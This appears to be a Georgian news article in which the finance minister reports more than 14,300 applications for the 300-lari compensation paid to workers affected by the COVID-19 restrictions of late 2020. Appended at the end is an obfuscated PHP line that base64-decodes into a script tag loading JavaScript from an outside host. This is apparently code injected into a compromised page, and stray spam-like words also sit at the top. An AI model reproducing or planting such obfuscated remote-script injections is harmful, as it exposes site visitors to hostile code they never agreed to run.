celsiusi
ავერსი საქკაბელი
"შეზღუდვების შედეგად სამუშაო დაკარგულებისთვის სახელმწიფოს მიერ მოქალაქეებისთვის განსაზღვრულ 300 ლარიან დახმარებებზე ამ დროისთვის 14 300-ზე მეტი განაცხადი გაკეთდა", - ამის შესახებ საქართველოს ფინანსთა მინისტრმა ივანე მაჭავარინმა საკოორდინაციო საბჭოს დასრულების შემდეგ ჟურნალისტებს განუცხადა.
 
მისი თქმით, არსებულ მონაცემებს შემოსაბლების სამსახური ჯანდაცვის სამინისტროს გადაუგზავნის, რათა გაიცეს 300 ლარიანი კომპენსაციები. „კომპენსაციების მოთხოვნის შესახებ განაცხადების მიღება დაწყებულია. შემოსავლების სამსახურში ამ მომენტისთვის 14 300-ზე მეტი განაცხადია შემოსული, რომელიც გადაეგზავნა ჯანდაცვის და სოციალური უზრუნველყოფის სამინისტროს და მალევე დაიწყება ამ კომპენსაციების გაცემა“, - განაცხადა ფინანსთა მინისტრმა.
 
ივანე მაჭავარიანმა მეწარმეებს მაქსიმალური აქტიურობისკენ და ყურადღებისკენ მოუწოდა და აღნიშნა, რომ მონაცემების შევსებისას პასუხისმგებლობა სწორედ განაცხადის შემვსებებს ეკისრებათ.
 
„კიდევ ერთხელ შევახსენებ მეწარმეებს, ვისაც შეეხო ბოლო პერიოდში გამოცხადებული შეზღუდვები, რომელიც ძალაში 2020 წლის 28 ნოემბრიდან შევიდა, ისარგებლონ შემოსავლების სამსახურის პორტალით. იქ არის შესაბამისი მარტივი ფორმა, სადაც უნდა მიუთითონ დასაქმებულის ვინაობა, პირადი მონაცემები და საბანკო ანგარიში, რომელსაც გადავაგზავნით ჯანდაცვის სამინისტროში; ეს პროცესი 24 დეკემბრამდე გაგრძელდება და მნიშნველოვანია მაქსიმალურად გამოიყენონ ეს დრო, თუმცა შესაძლებელი იქნება ინფორმაციის 28 დეკემბრამდე დაზუსტება. საჭიროა, მონაცემები სწორად იყოს მოწოდებული, პასუხისმგებლობა ეკისრება იმას, ვინც გვაწვდის ინფორმაციას. სისტემა აბსოლუტურად გამართულია და იქ არის კითხვა-პასუხის რეჟიმი, შესაბამისად, შეუძლიათ ამომწურავი ინფორმაცია მიიღონ პროცესის შესახებ“, - განაცხადა ივანე მაჭავარინმა.
 
ცნობისთვის, მიმდინარე წლის დეკემბერში ერთჯერადი 300 ლარიანი კომპენსაციები მიეცემათ იმ პირებს, რომლებიც დასაქმებულნი არიან იმ ობიექტებში, რომლებიც დამატებით შეზღუდვების გამო ვერ ფუნქციონირებენ. ამ მიზნით 2020 წლის ბიუჯეტში ჩადებულია 30 მლნ ლარი.
1889
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");